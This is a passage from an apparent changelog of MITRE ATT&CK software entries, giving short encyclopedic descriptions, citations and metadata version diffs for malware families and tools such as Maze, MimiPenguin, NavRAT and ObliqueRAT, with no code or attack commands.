ransomware, previously known as \"ChaCha\", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)(Citation: Sophos Maze VM September 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0449", + "external_id": "S0449" + }, + { + "source_name": "FireEye Maze May 2020", + "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html" + }, + { + "source_name": "McAfee Maze March 2020", + "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/" + }, + { + "source_name": "Sophos Maze VM September 2020", + "description": "Brandt, A., Mackenzie, P.. (2020, September 17). Maze Attackers Adopt Ragnar Locker Virtual Machine Technique. Retrieved October 9, 2020.", + "url": "https://news.sophos.com/en-us/2020/09/17/maze-attackers-adopt-ragnar-locker-virtual-machine-technique/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Maze" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "SarathKumar Rajendran, Trimble Inc" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:49.604000+00:00\", \"old_value\": \"2025-04-16 20:38:37.773000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-27 19:05:29.386000+00:00", + "modified": "2025-04-25 14:44:52.837000+00:00", + "name": "MechaFlounder", + "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0459", + "external_id": "S0459" + }, + { + "source_name": "Unit 42 MechaFlounder March 2019", + "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020.", + "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MechaFlounder" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:52.837000+00:00\", \"old_value\": \"2025-04-16 20:38:38.886000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--5a33468d-844d-4b1f-98c9-0e786c556b27", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:19.566000+00:00", + "name": "MimiPenguin", + "description": "[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0179", + "external_id": "S0179" + }, + { + "source_name": "MimiPenguin GitHub May 2017", + "description": "Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.", + "url": "https://github.com/huntergregal/mimipenguin" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MimiPenguin" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:19.566000+00:00\", \"old_value\": \"2025-04-16 20:38:52.183000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--5e7ef1dc-7fb6-4913-ac75-e06113b59e0c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:36.919000+00:00", + "modified": "2025-04-25 14:43:31.760000+00:00", + "name": "MiniDuke", + "description": "[MiniDuke](https://attack.mitre.org/software/S0051) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. The [MiniDuke](https://attack.mitre.org/software/S0051) toolset consists of multiple downloader and backdoor components. The loader has been used with other [MiniDuke](https://attack.mitre.org/software/S0051) components as well as in conjunction with [CosmicDuke](https://attack.mitre.org/software/S0050) and [PinchDuke](https://attack.mitre.org/software/S0048). (Citation: F-Secure The Dukes)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0051", + "external_id": "S0051" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MiniDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:31.760000+00:00\", \"old_value\": \"2025-04-16 20:38:12.056000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:53.681000+00:00", + "modified": "2025-04-25 14:43:09.588000+00:00", + "name": "MobileOrder", + "description": "[MobileOrder](https://attack.mitre.org/software/S0079) is a Trojan intended to compromise Android mobile devices. It has been used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029). (Citation: Scarlet Mimic Jan 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0079", + "external_id": "S0079" + }, + { + "source_name": "Scarlet Mimic Jan 2016", + "description": "Falcone, R. and Miller-Osborn, J.. (2016, January 24). Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists. Retrieved February 10, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:09.588000+00:00\", \"old_value\": \"2025-04-16 20:38:04.825000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--8a59f456-79a0-4151-9f56-9b1a67332af2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-28 22:09:15.461000+00:00", + "modified": "2025-04-25 14:43:57.040000+00:00", + "name": "MoleNet", + "description": "[MoleNet](https://attack.mitre.org/software/S0553) is a downloader tool with backdoor capabilities that has been observed in use since at least 2019.(Citation: Cybereason Molerats Dec 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0553", + "external_id": "S0553" + }, + { + "source_name": "MoleNet", + "description": "(Citation: Cybereason Molerats Dec 2020)" + }, + { + "source_name": "Cybereason Molerats Dec 2020", + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.", + "url": "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MoleNet" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:57.040000+00:00\", \"old_value\": \"2025-04-16 20:38:21.182000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9ea525fa-b0a9-4dde-84f2-bcea0137b3c1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:27.016000+00:00", + "modified": "2025-04-25 14:44:13.834000+00:00", + "name": "MoonWind", + "description": "[MoonWind](https://attack.mitre.org/software/S0149) is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. (Citation: Palo Alto MoonWind March 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0149", + "external_id": "S0149" + }, + { + "source_name": "Palo Alto MoonWind March 2017", + "description": "Miller-Osborn, J. and Grunzweig, J.. (2017, March 30). Trochilus and New MoonWind RATs Used In Attack Against Thai Organizations. Retrieved March 30, 2017.", + "url": "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "MoonWind" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:13.834000+00:00\", \"old_value\": \"2025-04-16 20:38:27.217000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--b63970b7-ddfb-4aee-97b1-80d335e033a8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-17 15:26:20.015000+00:00", + "modified": "2025-04-25 14:45:26.872000+00:00", + "name": "NBTscan", + "description": "[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0590", + "external_id": "S0590" + }, + { + "source_name": "Debian nbtscan Nov 2019", + "description": "Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021.", + "url": "https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html" + }, + { + "source_name": "SecTools nbtscan June 2003", + "description": "SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021.", + "url": "https://sectools.org/tool/nbtscan/" + }, + { + "source_name": "Symantec Waterbug Jun 2019", + "description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments" + }, + { + "source_name": "FireEye APT39 Jan 2019", + "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NBTscan" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:26.872000+00:00\", \"old_value\": \"2025-04-16 20:38:55.369000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d1183cb9-258e-4f2f-8415-50ac8252c49e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:44:44.759000+00:00", + "name": "NDiskMonitor", + "description": "[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0272", + "external_id": "S0272" + }, + { + "source_name": "NDiskMonitor", + "description": "(Citation: TrendMicro Patchwork Dec 2017)" + }, + { + "source_name": "TrendMicro Patchwork Dec 2017", + "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.", + "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NDiskMonitor" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:44.759000+00:00\", \"old_value\": \"2025-04-16 20:38:36.313000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--071d5d65-83ec-4a55-acfa-be7d5f28ba9a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 19:50:45.307000+00:00", + "modified": "2025-04-25 14:42:35.581000+00:00", + "name": "NOKKI", + "description": "[NOKKI](https://attack.mitre.org/software/S0353) is a modular remote access tool. The earliest observed attack using [NOKKI](https://attack.mitre.org/software/S0353) was in January 2018. [NOKKI](https://attack.mitre.org/software/S0353) has significant code overlap with the [KONNI](https://attack.mitre.org/software/S0356) malware family. There is some evidence potentially linking [NOKKI](https://attack.mitre.org/software/S0353) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0353", + "external_id": "S0353" + }, + { + "source_name": "NOKKI", + "description": "(Citation: Unit 42 NOKKI Sept 2018)" + }, + { + "source_name": "Unit 42 NOKKI Sept 2018", + "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/" + }, + { + "source_name": "Unit 42 Nokki Oct 2018", + "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NOKKI" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:35.581000+00:00\", \"old_value\": \"2025-04-16 20:37:53.448000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b4783be3-35d9-4a56-ac8d-1f3e1c9d9a84", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-04 19:36:55.518000+00:00", + "modified": "2025-04-25 14:44:28.081000+00:00", + "name": "NativeZone", + "description": "[NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0637", + "external_id": "S0637" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + }, + { + "source_name": "SentinelOne NobleBaron June 2021", + "description": "Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.", + "url": "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NativeZone" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:28.081000+00:00\", \"old_value\": \"2025-04-16 20:38:31.174000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--53a42597-1974-4b8e-84fd-3675e8992053", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:43:20.237000+00:00", + "name": "NavRAT", + "description": "[NavRAT](https://attack.mitre.org/software/S0247) is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. (Citation: Talos NavRAT May 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0247", + "external_id": "S0247" + }, + { + "source_name": "NavRAT", + "description": "(Citation: Talos NavRAT May 2018)" + }, + { + "source_name": "Talos NavRAT May 2018", + "description": "Mercer, W., Rascagneres, P. (2018, May 31). NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea. Retrieved June 11, 2018.", + "url": "https://blog.talosintelligence.com/2018/05/navrat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "NavRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:20.237000+00:00\", \"old_value\": \"2025-04-16 20:38:07.899000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--22b17791-45bf-45c0-9322-ff1a0af5cf2b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-06-30 14:44:35.055000+00:00", + "modified": "2025-04-25 14:42:50.875000+00:00", + "name": "Nebulae", + "description": "[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0630", + "external_id": "S0630" + }, + { + "source_name": "Bitdefender Naikon April 2021", + "description": "Vrabie, V. (2021, April 23). NAIKON \u2013 Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Nebulae" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:50.875000+00:00\", \"old_value\": \"2025-04-16 20:37:58.683000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f6d1d2cb-12f5-4221-9636-44606ea1f3f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:45:06.283000+00:00", + "name": "OSInfo", + "description": "[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0165", + "external_id": "S0165" + }, + { + "source_name": "Symantec Buckeye", + "description": "Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.", + "url": "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "OSInfo" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:06.283000+00:00\", \"old_value\": \"2025-04-16 20:38:43.861000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5864e59f-eb4c-43ad-83b2-b5e4fae056c9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-08 19:53:27.937000+00:00", + "modified": "2025-04-25 14:43:25.456000+00:00", + "name": "ObliqueRAT", + "description": "[ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0644", + "external_id": "S0644" + }, + { + "source_name": "Talos Oblique RAT March 2021", + "description": "Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.", + "url": "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html" + }, + { + "source_name": "Talos Transparent Tribe May 2021", + "description": "Malhotra, A. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal. Retrieved September 2, 2021.", + "url": "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ObliqueRAT" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:25.456000+00:00\", \"old_value\": \"2025-04-16 20:38:09.744000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--288fa242-e894-4c7e-ac86-856deedf5cea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-01-30 15:43:19.105000+00:00", + "modified": "2025-04-25 14:42:52.708000+00:00", + "name": "OceanSalt", + "description": "[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0346", + "external_id": "S0346" + }, + { + "source_name": "OceanSalt", + "description": "(Citation: McAfee Oceansalt Oct 2018)" + }, + { + "source_name": "McAfee Oceansalt Oct 2018", + "description": "Sherstobitoff, R., Malhotra, A. (2018, October 18). \u2018Operation Oceansalt\u2019 Attacks South Korea, U.S., and Canada With Source 